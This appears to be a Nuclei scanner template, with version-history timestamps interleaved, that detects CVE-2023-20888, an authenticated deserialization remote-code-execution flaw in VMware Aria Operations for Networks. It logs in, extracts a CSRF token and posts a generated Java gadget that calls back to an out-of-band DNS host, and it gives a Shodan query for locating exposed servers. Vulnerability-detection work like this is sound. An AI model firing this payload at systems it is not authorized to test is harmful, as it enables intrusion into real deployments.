2023-06-27 08:37:06 +00:00
id : CVE-2023-20888
info :
name : VMware Aria Operations for Networks - Remote Code Execution
author : iamnoooob,rootxharsh,pdresearch
severity : high
description : |
Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.
2023-06-27 08:37:06 +00:00
reference :
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20888
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2023-06-27 08:37:06 +00:00
cve-id : CVE-2023-20888
2023-07-11 19:49:27 +00:00
cwe-id : CWE-502
2023-10-14 11:27:55 +00:00
epss-score : 0.14273
2023-10-16 10:55:14 +00:00
epss-percentile : 0.95074
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
2023-06-27 08:37:06 +00:00
metadata :
verified : true
2023-06-28 05:00:04 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : vmware
product : vrealize_network_insight
2023-09-06 11:43:37 +00:00
shodan-query : title:"VMware Aria Operations"
2023-06-27 08:37:06 +00:00
tags : cve,cve2023,vmware,aria,rce,authenticated,oast
http :
- raw :
- |
POST /api/auth/login HTTP/2
Host : {{Hostname}}
Content-Type : application/json;charset=UTF-8
X-Vrni-Csrf-Token : null
{"username" : "{{username}}" , "password" : "{{password}}" , "domain" : "localdomain" }
- |
POST /api/events/push-notifications HTTP/2
Host : {{Hostname}}
X-Vrni-Csrf-Token : {{csrf}}
Content-Type : application/json
{"endOffset": "{{ generate_java_gadget(" dns", "http://{{interactsh-url}}", "base64") }} "}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-06-27 08:37:06 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- dns
- type : status
status :
- 500
extractors :
- type : regex
name : csrf
group : 1
regex :
- 'csrfToken":"([a-z0-9A-Z/+=]+)"'
internal : true
2023-07-11 19:49:27 +00:00
part : body